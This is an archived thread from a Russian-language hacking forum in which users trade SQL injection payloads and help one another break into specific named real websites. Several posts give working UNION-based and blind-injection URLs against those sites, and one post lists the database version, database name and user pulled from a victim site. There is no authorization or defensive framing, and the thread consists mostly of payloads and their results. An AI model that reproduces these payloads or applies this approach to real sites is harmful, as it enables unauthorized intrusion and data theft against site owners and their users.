HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.03.2009, 14:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://arainia.com/software/gizmo/overview.php?nID=4
Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...
 
Ответить с цитированием

  #2  
Старый 01.03.2009, 20:45
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
http://arainia.com/software/gizmo/overview.php?nID=4
Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...
Код:
http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+version(),2,3--
Вывод в исходной.
 
Ответить с цитированием

  #3  
Старый 01.03.2009, 15:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 mailbrush
по мне , так опять блинд


Version : 4.1.22-standard
Database : arainia_members
User : arainia_members@localhost



http://arainia.com/software/gizmo/overview.php?nID=4 AND ASCII(SUBSTRING((select+user() ),1,1))=x/

Последний раз редактировалось Gorev; 01.03.2009 в 15:03..
 
Ответить с цитированием

  #4  
Старый 01.03.2009, 15:06
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Gorev, эм.. где там вывод?
Цитата:
http://www.eu-gateway.eu/go.php?nID=-9+and+1=0+union+select+1,2,3,4,5
фух, а это что? тут не выводит
 
Ответить с цитированием

  #5  
Старый 01.03.2009, 15:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 mailbrush

вывода тм нет, на то она и есть слепая скуля что вывода нет.
http://www.eu-gateway.eu/go.php?nID=-9' тоже слепуха, читай про блинды
 
Ответить с цитированием

  #6  
Старый 01.03.2009, 15:24
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Только что прочитал... Вроде подставил, но всеравно та же ошибка - Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource. Подставлял:
Код:
http://www.eu-gateway.eu/go.php?nID=-9+OR+nID=IF(ASCII(SUBSTRING((SELECT+USER()),1,1)=254,1,0)
Что не так?
 
Ответить с цитированием

  #7  
Старый 01.03.2009, 15:44
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.eu-gateway.eu/go.php?nID=2+and+1=if(substring((select+version()) ,3,1)=0,1,(select+1+union+select+2))/*
версия 4.1
 
Ответить с цитированием

  #8  
Старый 01.03.2009, 21:32
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Код:
http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329
Вроде бы и скуля... а вроде и нет... подскажите)
 
Ответить с цитированием

  #9  
Старый 01.03.2009, 21:38
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Цитата:
Сообщение от wildshaman  
Код:
http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329
Вроде бы и скуля... а вроде и нет... подскажите)
Нет.
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #10  
Старый 01.03.2009, 21:40
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от AFoST  
Нет.
Хм, а почему тогда
Цитата:
SQL error

Error 1064, 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1'
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ